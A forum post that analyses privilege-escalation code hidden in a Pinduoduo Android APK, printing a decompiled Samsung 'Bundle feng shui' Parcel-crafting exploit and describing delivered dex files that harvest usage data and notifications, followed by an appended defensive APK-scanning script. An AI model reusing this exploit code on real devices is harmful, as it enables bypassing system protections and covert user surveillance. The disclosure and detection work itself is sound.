Privilege-escalation code embedded in the Pinduoduo APK, and an analysis of the dynamically delivered dex

Posted by 管理员 (administrator) on 2023-3-8 19:54:07

Reference: the article by 「深蓝洞察」: https://mp.weixin.qq.com/s/P_EYQxOEupqdU0BJMRqWsw (Bundle feng shui: a family of Android Parcel serialization/deserialization mismatch vulnerabilities, used as 0day/Nday attacks to bypass system checks and obtain system-level StartAnyWhere capability)
https://github.com/xuuhaoo/pinduoduo_backdoor
The reproduction steps are as follows:
Download a Pinduoduo APK released before March 5 (i.e. before version 6.50), for example version 6.49:
https://com-xunmeng-pinduoduo.en ... d/download/91472728
Unzip the APK and locate the file inside it that holds the privilege-escalation code:
pinduoduo-6-49-0.zip\assets\component\com.xunmeng.pinduoduo.AliveBaseAbility.7z\com.xunmeng.pinduoduo.AliveBaseAbility\vmp_src\mw1.bin
The file above is a VMP-packed dex. After unpacking it and restoring the code, you can find several exploit routines for privilege escalation, each targeting a different handset vendor's system, which is remarkably brazen. For example, the code exploiting the Samsung "com.samsung.android.cepproxyks.CertByte" privilege-escalation vulnerability looks like this:
// assets/component/com.xunmeng.pinduoduo.AliveBaseAbility
// [Manwei]
// com/xunmeng/pinduoduo/android_pull_ablity_comp/pullstartup/SamsungAlivePullStartup
import android.content.Intent;
import android.os.Bundle;
import android.os.Parcel;

// Hand-builds the raw Parcel bytes of a Bundle instead of going through the
// Bundle API, so that the receiving side deserializes the map differently
// from how it was laid out ("Bundle feng shui"). The Intent is embedded as a
// parcelable value under the key "intent".
public static Bundle makeBundleForSamsungSinceP(Intent intent) {
   Bundle bundle = new Bundle();
   Parcel obtain = Parcel.obtain();   // final Bundle parcel: length + magic + payload
   Parcel obtain2 = Parcel.obtain();  // hand-built Bundle payload (the key/value map)
   Parcel obtain3 = Parcel.obtain();  // serialized form of the Intent
   obtain2.writeInt(3);               // number of key/value entries in the map
   // Entry 1: a 13-char key written raw (int length + 28 bytes of UTF-16 data)
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(3);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(4);               // VAL_PARCELABLE, followed by the creator class name
   obtain2.writeString("com.samsung.android.cepproxyks.CertByte");
   obtain2.writeInt(0);
   byte[] b = new byte[0];
   obtain2.writeByteArray(b);         // empty byte array: length 0, no data
   obtain2.writeInt(0);
   // Entry 2: another 13-char key, value type VAL_INTEGER (1) with value 1
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(53);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(1);
   obtain2.writeInt(1);
   // Entry 3: a 13-char key, value type VAL_BYTEARRAY (13) with length -1
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(48);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(13);
   obtain2.writeInt(-1);
   int dataPosition = obtain2.dataPosition();   // start of the trailing "intent" entry
   obtain2.writeString("intent");
   obtain2.writeInt(4);                          // VAL_PARCELABLE
   obtain2.writeString("android.content.Intent");
   intent.writeToParcel(obtain3, 0);             // serialize the Intent on its own
   obtain2.appendFrom(obtain3, 0, obtain3.dataSize());
   int dataPosition2 = obtain2.dataPosition();
   // Overwrite the last int of the appended data with the byte length of the
   // "intent" entry, then restore the write position to the end.
   obtain2.setDataPosition(dataPosition2 - 4);
   obtain2.writeInt(dataPosition2 - dataPosition);
   obtain2.setDataPosition(dataPosition2);
   int dataSize = obtain2.dataSize();
   obtain.writeInt(dataSize);        // Bundle header: payload length
   obtain.writeInt(1279544898);      // 0x4C444E42, the "BNDL" magic
   obtain.appendFrom(obtain2, 0, dataSize);
   obtain.setDataPosition(0);
   bundle.readFromParcel(obtain);    // Bundle keeps the crafted bytes as lazily parcelled data
   return bundle;
}


Once it has escalated privileges, it starts running wild: dynamically delivering dex files, keeping itself alive, resisting uninstallation, and then going after data. This part of the code is fairly easy to follow, for example:
1a68d982e02fc22b464693a06f528fac.dex reads the app-usage records on the user's phone
95cd95ab4d694ad8bdf49f07e3599fb3.dex reads the notifications of the apps on the user's phone; this round wipes out every big company's app, doesn't it?
Go and look in the dex directory yourself.
Download addresses of some of the dex files (removed by Pinduoduo from its CDN servers on March 3):
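As an added example (not code from the post, nor from Pinduoduo or the referenced repository), here is a small Python triage script for the file-layout indicators described above: a nested 7z archive under assets/component, vmp_src/*.bin code blobs, dex headers hiding in non-.dex files, and the two delivered dex names quoted in the post. The APK-like zip it builds is constructed for the demo; real packages would be scanned from disk the same way.

```python
import io
import zipfile

# Real file signatures used for content-based checks.
SEVEN_ZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"
DEX_MAGIC = b"dex\n"

# Dex file names quoted in the post for the dynamically delivered payloads.
KNOWN_DEX_NAMES = {
    "1a68d982e02fc22b464693a06f528fac.dex",
    "95cd95ab4d694ad8bdf49f07e3599fb3.dex",
}


def build_sample_apk() -> bytes:
    """Constructed sample: an APK-like zip mimicking the layout from the post."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", DEX_MAGIC + b"035\0" + b"\0" * 64)
        z.writestr("assets/img/logo.png", b"\x89PNG\r\n\x1a\n")
        # Nested 7z archive under assets/component, as in the post's file path.
        z.writestr("assets/component/com.xunmeng.pinduoduo.AliveBaseAbility.7z",
                   SEVEN_ZIP_MAGIC + b"\0" * 32)
        # Opaque (packed) blob under a vmp_src directory; content is hypothetical.
        z.writestr("assets/component/x/vmp_src/mw1.bin", b"\x00" * 40)
        # A delivered dex dropped into the app's files dir (hypothetical location).
        z.writestr("files/1a68d982e02fc22b464693a06f528fac.dex",
                   DEX_MAGIC + b"035\0" + b"\0" * 64)
    return buf.getvalue()


def scan_apk(apk_bytes: bytes) -> list:
    """Return (path, reason) findings for suspicious entries in a zip/APK."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for info in z.infolist():
            name = info.filename
            head = z.read(name)[:8]          # only the header is needed for magic checks
            base = name.rsplit("/", 1)[-1]
            if name.startswith("assets/component/") and head.startswith(SEVEN_ZIP_MAGIC):
                findings.append((name, "nested 7z archive under assets/component"))
            if "/vmp_src/" in name and name.endswith(".bin"):
                findings.append((name, "VMP-packed code blob (vmp_src/*.bin)"))
            if head.startswith(DEX_MAGIC) and not name.endswith(".dex"):
                findings.append((name, "dex header in a non-.dex file"))
            if base in KNOWN_DEX_NAMES:
                findings.append((name, "dex name matches one quoted in the post"))
    return findings
```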